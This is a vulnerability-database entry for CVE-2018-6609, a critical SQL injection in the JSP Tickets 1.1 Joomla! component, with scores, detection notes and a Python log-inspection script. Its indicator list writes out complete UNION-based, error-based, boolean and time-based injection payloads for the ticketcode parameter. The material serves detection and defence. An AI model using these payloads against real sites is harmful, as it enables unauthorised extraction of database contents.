CVE-2018-6609
Published 2018-02-05
Priority: P261 · critical · 9.8 (CVSS 3.0)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EXPLOIT
EPSS: 2.70% (84.1th percentile)
SQL Injection exists in the JSP Tickets 1.1 component for Joomla! via the ticketcode parameter in a ticketlist edit action, or the id parameter in a statuslist (or prioritylist) edit action.
Affected
1 range
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| jsp_tickets_project | jsp_tickets | — | — |
Detection & IOCs (extracted from sources)
- command: `-66' /*!07777UNION*/ /*!07777SELECT*/ nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,/*!07777CONCAT*/((/*!07777SELECT*/+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+/*!07777FROM*/+INFORMATION_SCHEMA.TABLES+/*!07777WHERE*/+TABLE_SCHEMA=DATABASE())),nUlL,nUlL,nUlL,nUlL--+VerAyari`
- command: `option=com_jsptickets&controller=ticketlist&task=edit&ticketcode=5a71d319e86c1' AND 5298=5298 AND 'okLe'='okLe`
- command: `option=com_jsptickets&controller=ticketlist&task=edit&ticketcode=5a71d319e86c1' AND (SELECT 8072 FROM(SELECT COUNT(*),CONCAT(0x717a6a7871,(SELECT (ELT(8072=8072,1))),0x717a706a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'FwvD'='FwvD`
- command: `option=com_jsptickets&controller=ticketlist&task=edit&ticketcode=5a71d319e86c1' AND SLEEP(5) AND 'Ozir'='Ozir`
- command: `option=com_jsptickets&controller=ticketlist&task=edit&ticketcode=-4507' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a6a7871,0x72476c507a64564861484f575645536355695958564f4c4e6858625061774a6b59796b6571746249,0x717a706a71),NULL,NULL,NULL,NULL-- fcOG`
- Monitor GET requests targeting `option=com_jsptickets` with `controller=ticketlist&task=edit` and inspect the `ticketcode` parameter for SQL metacharacters (quotes, UNION, SLEEP, comment sequences).
- Monitor GET requests targeting `option=com_jsptickets` with `controller=statuslist&task=edit` or `controller=prioritylist&task=edit` and inspect the `id` parameter for SQL injection payloads.
- Detect the MySQL comment-obfuscated UNION injection patterns `/*!07777UNION*/` and `/*!07777SELECT*/` in HTTP query strings targeting the JSP Tickets component.
- Alert on time-based blind SQLi probes: presence of `SLEEP(5)` in the `ticketcode` or `id` parameter of com_jsptickets requests, combined with abnormal response latency.
- Detect error-based SQLi using `FLOOR(RAND(0)*2)` with `INFORMATION_SCHEMA.PLUGINS` and `GROUP BY` in requests to com_jsptickets endpoints.
- Note: All exploit payloads target version 1.1 of the JSP Tickets component specifically; other versions are not confirmed vulnerable.
- Note: The PoC URLs use `localhost` as a placeholder; the actual target path (`[PATH]`) must be substituted with the real Joomla installation path when writing detection signatures.
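The monitoring notes above, written as a log check. This is an added example, not code from this page or from any published rule set: it scopes to `com_jsptickets` edit requests, unwraps MySQL versioned comments so keyword rules still match, then tests the watched parameter against the listed indicators. The combined-log line format, the function name `inspect`, and the rule names are assumptions of this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Controller -> parameter named in the CVE-2018-6609 description.
WATCHED = {"ticketlist": "ticketcode", "statuslist": "id", "prioritylist": "id"}
REQUEST = re.compile(r'"GET (\S+) HTTP/')   # request target in an access-log line
VERSIONED = re.compile(r"/\*!\d*|\*/")      # MySQL /*!NNNNN ... */ wrappers

# Indicators from the detection notes; the rule names are this example's own.
RULES = [
    ("quote", re.compile(r"'")),
    ("union_select", re.compile(r"\bunion\b.*\bselect\b", re.I | re.S)),
    ("sleep_call", re.compile(r"\bsleep\s*\(", re.I)),
    ("floor_rand", re.compile(r"\bfloor\s*\(\s*rand\s*\(", re.I)),
    ("sql_comment", re.compile(r"--|/\*")),
]

def inspect(log_line):
    """Return (controller, parameter, sorted rule names), or None if not flagged."""
    m = REQUEST.search(log_line)
    if not m:
        return None
    query = parse_qs(urlsplit(m.group(1)).query, keep_blank_values=True)
    first = lambda key: query.get(key, [""])[0]
    param = WATCHED.get(first("controller"))
    if first("option") != "com_jsptickets" or first("task") != "edit" or not param:
        return None                          # out of scope for this CVE
    hits = set()
    for raw in query.get(param, []):         # parse_qs has already percent-decoded
        if "/*!" in raw:
            hits.add("versioned_comment")
        value = VERSIONED.sub(" ", raw)      # unwrap so \bunion\b can match
        hits.update(name for name, rx in RULES if rx.search(value))
    return (first("controller"), param, sorted(hits)) if hits else None

# Constructed log lines; parameter values are shortened from the strings listed above.
HEAD = '198.51.100.7 - - [05/Feb/2018:10:00:00 +0000] "GET /index.php?option=com_jsptickets'
TAIL = ' HTTP/1.1" 200 5120'
SAMPLE_LOG = [
    HEAD + "&controller=ticketlist&task=edit&ticketcode=5a71d319e86c1" + TAIL,
    HEAD + "&controller=ticketlist&task=edit&ticketcode=5a71d319e86c1'+AND+SLEEP(5)+AND+'Ozir'='Ozir" + TAIL,
    HEAD + "&controller=statuslist&task=edit&id=-66%27+/*!07777UNION*/+/*!07777SELECT*/+nUlL--+VerAyari" + TAIL,
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(inspect(line))
```

The latency half of the `SLEEP` alert needs a log format that records request duration, which the sample line format here does not carry.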
CVSS provenance
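| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.0 | 9.8 | CRITICAL | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P |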